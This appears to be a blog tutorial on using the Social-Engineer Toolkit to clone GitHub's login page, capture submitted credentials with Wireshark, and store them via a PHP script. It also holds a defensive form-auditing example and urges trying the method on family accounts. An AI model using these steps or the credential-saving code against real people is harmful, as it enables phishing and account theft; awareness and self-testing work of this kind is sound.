Phish like a Phisher, Defend like a Guardian.

Abdul Basit Rotimi
6 min read · Sep 20, 2024


This content focuses on hardening our security environment against one of the world’s most powerful attack vectors: SOCIAL ENGINEERING. I’ll be guiding you on how to create malicious webpages to test yourself (or family) and enhance your security posture.

Disclaimer: This is for educational purposes only.

My definition of Cybersecurity is: Intention

This blog is for everyone. Try it out for yourself, but remember not to hack others. As I mentioned, Cybersecurity is intention.

What do I need to phish like a phisher?

  1. Internet connectivity
  2. Kali Linux
  3. Mobile Phone
  4. Wireshark
  5. Good mind

That’s all you will need to phish like a phisher. What about defending like a Guardian?

  1. Creativity
  2. Think outside the box
  3. Awareness.

Let’s GO

Before you start, keep your water or coffee beside you and relax. We are learning together!

Spin up your Kali Linux VM (Virtual Machine).

My Kali desktop page.

Now, navigate to your Linux terminal.

This is the Linux terminal

We need to switch to the root user, which is a superuser, by typing the command sudo su. sudo means 'superuser do', and here it is used to switch to the root user. You may be prompted to enter a password, depending on your configuration.

I’m now a SuperMAN

Is that all? No!

We need to use a tool called the Social-Engineer Toolkit (SET). A big shoutout to David Kennedy and his team for creating this amazing tool.

Type <setoolkit>, hit Enter, and take a sip of water.

You will see this interface.

Hmm! What are your initial thoughts about this tool? Feel free to comment.

If you’re experiencing any issues with the tool, follow this link for installation guidance.

This is where the power lies.

I won’t go into further detail about the options shown above. Remember, the tool is capable of doing things you might not consider.

Now, press ‘1’ on your keyboard and take a coffee break.

Ask yourself: what does it take to be a phisher?

As I mentioned earlier, ‘The tool is capable of doing things you might not think of.’ Now, please press ‘2’ on your keyboard.

Read through the text to understand how it works.

We are selecting option “3”, which is the Credential Harvester, because we want to phish like a phisher.

Are you now thinking like a Badass Hacker?

We are using option “2”, which clones the login page of any website you choose.

What is this?

Just press the Enter key if you have your IP (Internet Protocol) address. Otherwise, type in your machine’s IP address.

Yes, We got this.

Choose any website, preferably a login page. In my case, I’ll use ‘https://github.com/login/’. Press Enter, and take a sip of water while you wait.

Something like this might come up.

The information in the image is telling us the path to find our document. Hit Enter.

You are a step closer to being a phisher.

Now we need to spin up Wireshark to monitor the packet traffic and listen for information from our victim.

Double-click on the Wireshark icon.
I believe you are here.

eth0 stands for ‘Ethernet 0’, which refers to the connection you want to monitor. If you’re using Bluetooth or another address, simply double-click on the floating graph for eth0 and wait.

Before you double-click eth0, open a browser of your choice. In my case, I’m using Mozilla Firefox.

This is cool guys.

In the browser’s URL (Uniform Resource Locator) bar, type the IP address provided in the setoolkit terminal.

Who are you now?

We are trying to think like a hacker, and at the same time we are creating awareness so that everyone out there is conscious of potential attack vectors.

Let’s go back to Wireshark to monitor our packet activity.

Double-click on eth0.
You should find yourself here.

We’ll monitor our victim information submitted on the login page.

Click on Sign in

I can’t wait to phish the victim information.

Oops!!!

The page was redirected to the real GitHub page.

Let’s dig out the information with Wireshark. Type the display filter <http> in the Wireshark interface.

We got this.

Right-click on the POST packet.

Two Options

Click on Follow. There are two options to select: the TCP (Transmission Control Protocol) stream and the HTTP (Hypertext Transfer Protocol) stream. Click on the HTTP stream.

You are now a badass Social Engineer.

We have obtained the victim’s username and password.

Let’s quickly dive into the secret code that helps us capture the victim’s credentials.

Right-click on this page.

View the page source, and you’ll see a series of codes. It may look messy, but I will teach you how to investigate it.

I’m scared.

Now that you’re in the page source, press Ctrl + F on your keyboard. This command allows you to find specific text or words on the page or in the document.

I searched for PHP. This is dreadful. Below is the code injected into the cloned GitHub page. This form submits the credentials to post.php, which presumably captures the information for storage on the server.

<form data-turbo="false" action="http://192. /post.php" method="post">
<input type="hidden" name="authenticity_token" value="OMWymZhkKrcBFQxfbIC1HCgNoPZiGmtf6KwmQp8hfiXUwy+p7n4YCKJ948/2n+Ka3JYF/vpbWwLusNOe5Vsgqg==" />
<input type="hidden" name="add_account" id="add_account" autocomplete="off" class="form-control" />

<label for="login_field">Username or email address</label>
<input type="text" name="login" id="login_field" class="form-control input-block" required />

<label for="password">Password</label>
<input type="password" name="password" id="password" class="form-control" required />

<input type="submit" name="commit" value="Sign in" class="btn btn-primary btn-block" />
</form>

If you are looking for how to save this information in a document or database on the server, you would need to modify the server-side script (post.php) to handle that task. For example, you can write the submitted data to a file like this (in PHP):

<?php
$username = $_POST['login'];
$password = $_POST['password'];

// Save data to a text file
$file = 'credentials.txt';
$data = "Username: $username, Password: $password\n";
file_put_contents($file, $data, FILE_APPEND);
?>

Let’s compare the script on the real GitHub page:

<form data-turbo="false" action="/session" accept-charset="UTF-8" method="post">

The real GitHub login page’s HTML does not include any reference to a post.php file in its form actions. The form is set to submit to /session, as seen above.

There is no mention of post.php in the real page. If you're looking to simulate sending credentials to a specific PHP file (like post.php), you would need to modify the action attribute of the form to point to post.php instead. Here's an example of how it would look:

<form data-turbo="false" action="http://your-server-ip/post.php" accept-charset="UTF-8" method="post">

This would then submit the form data to post.php on your server.

Yes, we are now a phisher.

Takeaway:

  1. Don’t just click a link.
  2. Verify the source.
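
The form comparison above is also something a defender can check automatically. The following is an added example, not code from the original post or from SET: it parses a page's HTML and lists why submitting a password from it would be unsafe. The function names, the expected_host parameter and the 192.0.2.10 sample address are assumptions made for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class PasswordForms(HTMLParser):
    """Hypothetical helper: record the action of every form with a password input."""
    def __init__(self):
        super().__init__()
        self.current = None   # action of the form being parsed, if any
        self.actions = []
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.current = attrs.get("action") or ""
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            if self.current is not None:
                self.actions.append(self.current)
    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def audit_login_form(page_url, html, expected_host):
    """Return reasons not to type a password here; expected_host is an assumed input."""
    parser = PasswordForms()
    parser.feed(html)
    reasons = []
    for action in parser.actions:
        # An empty or relative action resolves against the URL actually loaded.
        target = urlsplit(urljoin(page_url, action))
        host = target.hostname or ""
        if target.scheme != "https":
            reasons.append(f"{target.geturl()}: password sent without TLS")
        if is_ip_literal(host):
            reasons.append(f"{host}: form posts to a bare IP address")
        elif host != expected_host:
            reasons.append(f"{host}: form posts outside {expected_host}")
    return reasons

# Constructed samples: 192.0.2.10 is a documentation address, not the post's.
CLONED = '<form action="http://192.0.2.10/post.php" method="post"><input type="password" name="password" /></form>'
REAL = '<form action="/session" method="post"><input type="password" name="password" /></form>'
if __name__ == "__main__":
    print(audit_login_form("http://192.0.2.10/", CLONED, "github.com"))
```

A relative action such as /session is only safe when the page itself was loaded from the expected host, which is why the check resolves it against the loaded URL first.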

“What do you think about my writing style?”

Clap for yourself, and practice this. In my next blog post I will teach how to do this in real-world scenarios, in which you’ll hack your family’s accounts and educate them. “Cybersecurity is Intention”

Don’t forget it’s your gUy — Abdul Basit Rotimi

Follow me for more cybersecurity content.

Written by Abdul Basit Rotimi

Abdul Basit is a seasoned cybersecurity analyst who loves to provide security solutions to attack victims.